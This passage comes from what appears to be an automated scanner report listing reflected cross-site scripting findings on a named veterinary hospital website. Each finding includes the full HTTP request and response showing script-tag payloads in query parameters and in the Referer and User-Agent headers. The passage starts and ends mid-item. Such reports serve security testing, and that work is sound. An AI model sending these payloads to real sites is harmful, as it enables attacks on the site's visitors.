<input name="time3" id="time3" type="text" size="15" maxlength="50" value="fbc15"><script>alert(1)</script>a12a15661f1" />
...[SNIP]...

2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c98f"><script>alert(1)</script>1c63589670 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253
b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r71o8vgd1ptoa4ae288u3u1u00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%
...[SNIP]...

2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c08"><script>alert(1)</script>fa2f4234571 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08
"><script>alert(1)</script>fa2f4234571&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=42ioijmo61q4lhnolf0g547n70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08"><script>alert(1)</script>fa2f4234571&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)" />
...[SNIP]...

2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9a7"><script>alert(1)</script>a58880500cd was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&user
agent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=njd61do981s3a37nqrprgfios7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd" />
...[SNIP]...

2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd10"><a>af94765ca4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/appt.htmlfbd10"><a>af94765ca4d HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="apptfbd10"><a>af94765ca4d">
...[SNIP]...

2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /plymouth/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b638a"><script>alert(1)</script>3e858d70063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1" />
...[SNIP]...

2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /plymouth/more/boarding.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><a>2035dd31204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/more657cd"><a>2035dd31204/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="more657cd"><a>2035dd31204">
...[SNIP]...

2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a275f"><script>alert(1)</script>50189f95eed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:32 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed" />
...[SNIP]...

2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aeba"><script>alert(1)</script>f4116ac98b0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0" />
...[SNIP]...

2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e77"><script>alert(1)</script>8105a26b689 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qur1s877iqte90hbj289vogdv5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689" />
...[SNIP]...

2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93282"><script>alert(1)</script>5b7938f8052 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
